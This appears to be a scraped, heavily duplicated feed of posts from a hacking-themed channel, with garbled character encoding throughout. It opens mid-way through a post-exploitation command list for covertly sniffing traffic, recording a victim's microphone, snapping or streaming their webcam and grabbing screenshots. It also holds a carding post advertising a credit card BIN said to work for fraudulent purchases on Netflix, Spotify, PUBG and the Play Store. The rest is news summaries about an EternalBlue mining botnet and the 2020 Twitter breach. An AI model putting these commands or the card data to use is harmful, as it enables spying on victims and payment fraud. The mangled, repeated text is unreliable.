snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor โ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GitHub Enterprise Remote Code Execution.pdf
208 KB
GitHub Enterprise Remote Code Execution
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
BIN Multifunctional:(PUBG)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA ๐บ๐ธ
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA ๐บ๐ธ
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWe all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitterโs initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
โLarge companies and individualsโ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We donโt know how the attack happened Yes, I donโt know how much damage to Twitterโs own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
ใใ"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
๐ฆWe all know what happen's to twitter but the real details :
#news
?Twitter mass hacking may evolve into a global security crisis
Sina Technology News, July 16th, Beijing time, according to foreign media reports, Bitcoin scammers will not be the last person to steal a certified account-we should be vigilant, because there will be other people to steal our account .
Everything is expected.
The hacker attack on July 15, 2020 is TwitterThe worst security breach in company history. No matter how the company ultimately tells the story, one thing must be acknowledged that the crisis has been brewing as early as a few years ago.
Since the spring of 2018, scammers have been posing as well-known cryptocurrency enthusiast Elon Musk. They use Musk's avatar, choose a similar username, and then post an effective invitation that looks like a pie in the sky: lend him some cryptocurrency and he will give you back more. Sometimes scammers will reply to a connected and authenticated account (such as Musk's SpaceX) to make the fake account look more real. Scammers also spread false tweets through botnets, also to increase authenticity.
The events of 2018 let us see three things. First, there are always people who are deceived, and every time someone is deceived, it is enough to inspire further fraud; second, Twitter's handling of this threat is slow, far less than the company's promise to take these issues seriously in the morning; Third, the needs of scammers and Twitterโs initial countermeasures formed a cat-and-mouse game, which in turn encouraged criminals to take more aggressive actions to create damage.
So there is today's largest attack. Nick Statt reports:
โLarge companies and individualsโ Twitter accounts have recently encountered the largest hacker attack on the platform ever. All attacks are aimed at promoting bitcoin scams, and the initiators seem to have earned a small amount of money from them. We donโt know how the attack happened Yes, I donโt know how much damage to Twitterโs own system. The hackers seem to have stopped, but the authentication account has been posting new scam tweets from 4 pm Eastern time, which has lasted for more than two hours. It has been silent for more than one hour At last, Twitter finally admitted the time of the hacker attack. At 5:45 ET, it wrote on the company's user support account:'We have been informed of the security incidents affecting users of our platform. We are investigating and actively taking measures to respond to the attack. We We will provide you with the latest information as soon as possible.'"
Including former President Barack Obama, Joe Biden, AmazonCEOs Jeff Bezos, Bill Gates and pop singer Kanye West among others and AppleAnd UberThe authentication accounts of other technology companies were hacked.
But they are all later things. Who was the first celebrity account to be attacked? Elon Musk, no doubt.
In the first few hours of hacking, the deceived people sent more than 118,000 dollars to the hackers. In addition, hackers may also access a large number of personal direct messages. Even more disturbing is the speed and scale of hacker attacks, as well as deeper national security issues.
Of course, the most important and most obvious question is, who is the initiator of the attack and how did they do it? As of press time, we have no answer. According to a report by security reporter Joseph Cox, screenshots shared among members of the underground hacker community show that someone can access the tools used to manage accounts within Twitter. Cox wrote:
ใใ"Two sources of the underground hacker community provided a screenshot of an internal control panel to the media. It is alleged that Twitter employees use this internal control panel to manage user accounts. A source said that this control panel of Twitter is also used to Change the ownership of certain so-called OG accounts. Twitter has deleted screenshots of these control panels and suspended the user accounts that posted these screenshots, saying the content violates community rules."
Continuing speculation will inevitably appear irresponsible, but Coxโs report has at least stated that this is not a simple and ordinary hacking incident. One possibility is that a hacker broke Twitterโs internal tools; Cox also proposed another possibility. There are ghosts in Twitter employees who participated in this attack-if that is the case, then Twitter is really a lottery in the year. Twice.
In either case, Twitterโs response to this incident has caused further confusion. The companyโs earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
In either case, Twitterโs response to this incident has caused further confusion. The companyโs earliest tweet about this matter basically did not mention any substantive content. Two hours later, Twitter simply stated that the company has disabled the tweet function of the authenticated account, or has reset their password. Try to investigate the root cause of the attack. But just before Twitter explained the situation, many users were already forced to find that they couldn't tweet.
Politicians, celebrities, and national news media will not be able to tweet, but save Twitter some public relations trouble. Although ordinary users are ridiculous, but think about more serious problems. Twitter, whether good or bad, is always one of the most important communication systems in the world. Many of its users are related to emergency medical services. For example, the National Weather Service of Lincoln, Illinois just issued a tornado warning before the certification account was banned. Those who rely on this account to understand the follow-up of the tornado may be unlucky.
Of course, Twitter's ban on certified account statements is also a last resort. People probably prefer that the National Meteorological Service can't push, or want hackers to sell their accounts to criminals and then the latter took the opportunity to log in to the account to post some false information, such as falsely claiming that the tornado fee swept the major cities of the United States and so on. But using this clumsy method to solve the problem-prohibiting most of the 359,000 certified accounts from publishing messages-reflects the wide scope of the incident.
Then you can't help but wonder what emergency measures the company will take if it is not a greedy bitcoin scammer next time, but a national-level person or a mental patient. After this incident, it is not difficult to imagine that if someone controls the account of a world leader and then attempts to launch a nuclear war, it is possible.
At this point, what the Senator Josh Hawley of the Republic of Missouri mentioned in his letter to Twitter CEO Jack Dorsey is very resonant. Holly said:
"I am concerned that this incident is not just a series of planned and premeditated independent hacker attacks, but also a successful attack on Twitter's own security. As you know, your millions of users not only rely on your service for public release Tweets also use your direct messaging service to communicate with each other in private. Successful attacks on your system's servers will pose a threat to the privacy and data security of all users."
However, Holly did not say comprehensively. Here, not only user privacy and data security are threatened. More importantly, impostor and fraud on Twitter are very likely to cause turmoil in the real world. To this day, we have seen this assumption actually happen. With less than four months left before the 2020 election, God knows exactly what will happen.
In the next few days, Twitter may investigate the cause of the security incident. The company may not be able to give a completely satisfactory explanation. But the important thing is that Twitter shares with the public what it has learned about the incident in a timely manner-and what measures the company will take in the future to prevent such a thing from happening again. (noob)
@โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ